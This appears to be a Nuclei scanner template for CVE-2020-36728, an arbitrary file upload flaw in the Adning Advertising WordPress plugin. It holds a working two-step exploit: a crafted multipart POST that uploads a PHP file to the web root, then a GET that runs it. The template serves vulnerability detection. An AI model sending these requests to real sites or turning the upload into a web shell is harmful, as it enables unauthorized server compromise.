漏洞描述
The Adning Advertising plugin for WordPress versions below 1.5.6 is vulnerable to arbitrary file upload, allowing attackers to upload malicious files to the server.
id: CVE-2020-36728
info:
name: WordPress Plugin Adning Advertising < 1.5.6 - Arbitrary File Upload
author: iamnoooob,pdresearch
severity: medium
description: |
The Adning Advertising plugin for WordPress versions below 1.5.6 is vulnerable to arbitrary file upload, allowing attackers to upload malicious files to the server.
reference:
- https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/
- https://blog.nintechnet.com/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild/
- https://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
- https://nvd.nist.gov/vuln/detail/CVE-2020-36728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2020-36728
epss-score: 0.77717
epss-percentile: 0.98941
cpe: cpe:2.3:a:tunasite:adning_advertising:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: tunasite
product: adning_advertising
framework: wordpress
fofa-query: body="served by Adning"
tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce,vkev,vuln
flow: http(1) && http(2)
variables:
marker: "{{randstr}}"
filename: "{{randbase(8)}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=b214a08e1c094defed15a5cc4c2285ee
--b214a08e1c094defed15a5cc4c2285ee
Content-Disposition: form-data; name="allowed_file_types"
php,jpg,jpeg
--b214a08e1c094defed15a5cc4c2285ee
Content-Disposition: form-data; name="upload"
{"dir": "../"}
--b214a08e1c094defed15a5cc4c2285ee
Content-Disposition: form-data; name="files[]"; filename="{{filename}}.php"
<?php echo base64_decode($_GET["input"]);?>
--b214a08e1c094defed15a5cc4c2285ee--
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, '{{filename}}','tmp_name','grid_item','success')"
condition: and
internal: true
- raw:
- |
GET /{{filename}}.php?input={{base64(marker)}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '{{marker}}')"
condition: and
# digest: 490a00463044022009d5603d25573c2f08006bcdd80b9b8480a1455f56f58b770a33dd3e886695ba02200302b9c92347d8a1fa74a91ca1e038a72e86d6b4b3d2e3e73540cfe31308503a:922c64590222798bb761d5b6d8e72950